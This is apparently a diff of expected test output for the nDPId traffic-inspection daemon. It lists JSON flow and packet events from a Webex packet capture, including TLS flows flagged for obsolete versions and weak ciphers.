-00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1282,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570699916,"flow_last_seen":1444570700123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570700123,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1302,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570700561,"flow_last_seen":1444570700561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570700561,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1444570700561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570700561,"pkt":"ABoRAAACABoRAAABCABFAAA8d7ZAAEAG+m4KCAABUEpuRIMRAbsN6aumAAAAAKACOQgrqQAAAgQFtAQCCAoATNwQAAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1303,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1444570700563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570700563,"pkt":"ABoRAAACABoRAAABCABFAAAoA4lAABAGnrBQSm5ECggAAQG7gxHyFlRZDemrp1AS\/\/9ibgAA"} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1304,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570700563,"flow_last_seen":1444570700563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570700563,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1304,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1444570700563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570700563,"pkt":"ABoRAAACABoRAAABCABFAAA8CyVAAEAGZwAKCAABUEpuRIMSAbsmf9c3AAAAAKACOQjnfgAAAgQFtAQCCAoATNwSAAAAAAEDAwY="} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1305,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1444570700565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570700565,"pkt":"ABoRAAACABoRAAABCABFAAAoA4pAABAGnq9QSm5ECggAAQG7gxLZgCjIJn\/XOFAS\/\/9ibQAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1306,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1444570700565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570700565,"pkt":"ABoRAAACABoRAAABCABFAAAod7dAAEAG+oEKCAABUEpuRIMRAbsN6aun8hZUWlAQOQgpZwAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1307,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1444570700565,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570700565,"pkt":"ABoRAAACABoRAAABCABFAAAoCyZAAEAGZxMKCAABUEpuRIMSAbsmf9c42YAoyVAQOQgpZgAA"} -00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1308,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570700561,"flow_last_seen":1444570700615,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570700615,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1310,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570700563,"flow_last_seen":1444570700616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570700616,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1312,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570700561,"flow_last_seen":1444570700767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570700767,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1313,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570700563,"flow_last_seen":1444570700767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570700767,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1408,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570712008,"flow_last_seen":1444570712008,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570712008,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1408,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1444570712008,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570712008,"pkt":"ABoRAAACABoRAAABCABFAAA8BPxAAEAGfVYKCAABrfMAbtmHAbtwYOR3AAAAAKACOQhFnAAAAgQFtAQCCAoATOCLAAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1444570712012,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570712012,"pkt":"ABoRAAACABoRAAABCABFAAAoA7pAABAGrqyt8wBuCggAAQG72YePnxuIcGDkeFAS\/\/8cJQAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1410,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1444570712013,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570712013,"pkt":"ABoRAAACABoRAAABCABFAAAoBP1AAEAGfWkKCAABrfMAbtmHAbtwYOR4j58biVAQOQjjHQAA"} -00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1411,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570712008,"flow_last_seen":1444570712016,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570712016,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01403{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1416,"source":"webex.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570712008,"flow_last_seen":1444570713707,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570713707,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1425,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570713719,"flow_last_seen":1444570713719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570713719,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1425,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1444570713719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570713719,"pkt":"ABoRAAACABoRAAABCABFAAA8m55AAEAG1oYKCAABUEpuRIMXAbuTJntGAAAAAKACOQjR\/QAAAgQFtAQCCAoATODYAAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1444570713727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570713727,"pkt":"ABoRAAACABoRAAABCABFAAAoA8NAABAGnnZQSm5ECggAAQG7gxds2YS5kyZ7R1AS\/\/9iaAAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1444570713730,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570713730,"pkt":"ABoRAAACABoRAAABCABFAAAom59AAEAG1pkKCAABUEpuRIMXAbuTJntHbNmEulAQOQgpYQAA"} -00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1429,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570713719,"flow_last_seen":1444570713734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570713734,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1433,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570713719,"flow_last_seen":1444570715238,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570715238,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1454,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570716599,"flow_last_seen":1444570716599,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570716599,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1444570716599,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570716599,"pkt":"ABoRAAACABoRAAABCABFAAA8ldZAAEAGdtEKCAABPm3lnsqRAbsgVHeCAAAAAKACOQiaIAAAAgQFtAQCCAoATOJUAAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1444570716603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570716603,"pkt":"ABoRAAACABoRAAABCABFAAAoA9FAABAGOOs+beWeCggAAQG7ypHfq4h9IFR3g1AS\/\/+1cAAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1456,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1444570716604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570716604,"pkt":"ABoRAAACABoRAAABCABFAAAolddAAEAGduQKCAABPm3lnsqRAbsgVHeD36uIflAQOQh8aQAA"} -00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1457,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570716599,"flow_last_seen":1444570716610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570716610,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01404{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1460,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570716599,"flow_last_seen":1444570717923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570717923,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640269,"flow_last_seen":1444570640269,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1444570640269,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640269,"pkt":"ABoRAAACABoRAAABCABFAAA8fMBAAEAGd0oKCAABch3Ki7gfAbudV783AAAAAKACOQjtmQAAAgQFtAQCCAoATMP3AAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1444570640284,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640284,"pkt":"ABoRAAACABoRAAABCABFAAAoAfNAABAGIixyHcqLCggAAQG7uB9iqEDInVe\/OFAS\/\/+vRQAA"} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":463,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640284,"flow_last_seen":1444570640284,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640284,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1444570640284,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640284,"pkt":"ABoRAAACABoRAAABCABFAAA8nBhAAEAGTKkKCAABch3V1KMdAbtvG1\/vAAAAAKACOQiE1wAAAgQFtAQCCAoATMP3AAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1444570640298,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640298,"pkt":"ABoRAAACABoRAAABCABFAAAoAfRAABAGFuJyHdXUCggAAQG7ox2Q5KAQbxtf8FAS\/\/+4\/gAA"} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640298,"flow_last_seen":1444570640298,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640298,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1444570640298,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640298,"pkt":"ABoRAAACABoRAAABCABFAAA8YQlAAEAGkVsKCAABch3MMcncAbvjbaL+AAAAAKACOQiwWQAAAgQFtAQCCAoATMP3AAAAAAEDAwY="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1444570640309,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640309,"pkt":"ABoRAAACABoRAAABCABFAAAoAfVAABAGIIRyHcwxCggAAQG7ydwckl0B422i\/1AS\/\/+b4gAA"} 